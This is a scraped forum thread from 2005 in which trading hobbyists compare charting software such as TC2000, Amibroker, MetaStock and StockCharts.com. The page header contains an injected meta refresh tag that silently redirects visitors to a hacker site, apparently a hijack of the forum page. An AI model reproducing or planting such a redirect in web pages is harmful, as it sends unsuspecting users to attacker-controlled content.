Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - Charting software question
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Charting software question

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
gkk2001

PostPosted: Tue Mar 08, 2005 9:57 pm    Post subject: Charting software question Reply with quote

I am another new one here having traded several years ago, but not with alot of zeal and effort. Am ready to get into this in a serious way, papertrading while becoming educated. Who knows how long that will take.
Question
But what software do you use? Are there software programs preferred for commodities and other programs preferred for stocks?

Greg Very Happy
tab321

PostPosted: Tue Mar 08, 2005 11:09 pm    Post subject: Preferred Software Reply with quote

Greg:

If you want to trade with Steve Bigalow and Candles.....TC 2000 or the now Telechart 2005 is pretty hard to beat. It does not do commodities. Your cheapest and best route for that is Amibroker. Although, the learning curve for Amibroker is/can-be a bit stiff.

KarlaF

PostPosted: Thu Mar 10, 2005 3:55 am    Post subject: Reply with quote

it also depends on what you want to do with the software.
do you need fundamental data also? more charting capability? possibility to program things on your own?
comprehensive scanning capabiluty?
for sofware you have to define your needs much more.
otherwise you should use free tools on the web, that would save some money
karla
guy

PostPosted: Thu Mar 10, 2005 11:59 am    Post subject: scanning Reply with quote

For stock scanning I like StockCharts.com advanced scanner as it allows u to write ur own scans. I like to write scans for candlestick signals and TA. Also it has intra day scans which can be useful for entering a stock while it is completing the candle pattern (signal).
SteveB

PostPosted: Sat Mar 12, 2005 1:03 pm    Post subject: MetaStock Reply with quote

I realize the majority of people here use either TCNet or TC2000 (now TeleScan 2005??) but does anyone use MetaStock Pro or MetaStock end-of-day? I installed Pro (only using it as end-of-day for now as I have real-time Streamer through Ameritrade) yesterday and will spend some of the weekend going through it all but it seems very good so far. I like it and it seems to be what I'm looking for. Does anyone have any good or bad experience with it?
tab321

PostPosted: Sat Mar 12, 2005 2:46 pm    Post subject: MetaStock Reply with quote

SteveB

I have never learned MetaStock but have talked to a lot of people who use it. It seems to be the cadillac of the stock software. For most people, it is a little expensive and it is not nearly as easy to learn and use as TC 2000 which is now TC 2005. Nevertheless, it will do MUCH more.

Anyway....the real issue is making up your mind if you really like it before you invest hundreds of hours learning how to get all the juice out of it. If you like it and keep using it, your time is very well spent. If you spend a lot of time learning something that you will not keep, the time is wasterated.

Likewise, there is no need to spend money on a souped up software unless you are going to learn to get the bells and whistles out of it. And if you invest your time to learn to do that.....you will probably love it and never want anything else. No doubt - it is the cadillac.

guy

PostPosted: Sat Mar 12, 2005 4:03 pm    Post subject: software Reply with quote

Interesting comments about software. I guess my situation and perspective are different from most peoples. I am retired and enjoy the trading as an interest activity. I am not interested in making lots of $ at trading but I am interested in having lots of fun. I use the StockCharts.com (see above post) RT software as it is easy to use and relatively inexpensive. It works well for my purposes and my acoount consistantly stays in the green month after month. I accomplish this by being fussy about the trades I enter and using effective stops that are consistant with good money management priniciples. I swing trade rather then day trade as I realize that in order to get on the inside of the track (the fast lane) of daytrading very expensive and sophisticated software and knowledge is required or the bigger fish will make a meal out of you. I guess it comes down to what you are trying to accomplish with your trading. Is the objective to have fun or make money ? For me its fun and a low overhead easy to use system like StockCharts works for me. Mr. Green ENJOY !
tab321

PostPosted: Sat Mar 12, 2005 4:50 pm    Post subject: The Software Reply with quote

Guy - you make a good point - as did Karla. Much of what you need depends on your use. All the software programs that are nice and that may cost you money do not in any way make the free stuff invalid.

Stochcharts is a great resource. For those who can do it that way, it is great. In fact, for those who are already accustomed to doing it that way, there is no need to change.

The same is true with seminars, tutorials, etc. You can pay a high price for them or you can find most of it for free on the internet if you have the time to search for it. Many of the best ideas that I came across were found at the free sites.....just takes a while to search it and sort it out.

Glad to hear you make use of the free stuff and even more happy for you that you stay in the GREEN month after month. That is what it is all about.

Hey - why don't you tell us how you pick your stocks? Do you use any favorite Candle Signals and favorite indicators? Are there any favoritie searches that you do? What is your main entry criteria for a stock?
gkk2001

PostPosted: Mon Mar 14, 2005 7:29 pm    Post subject: gecko track and trade? Reply with quote

Someone clued me into Track n Trade. I got the free demo CD and it looks good. The entire package is $1000 for the whole thing, all extras included.

Anyone wish or can comment about this software for commodities options?

Greg Smile
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: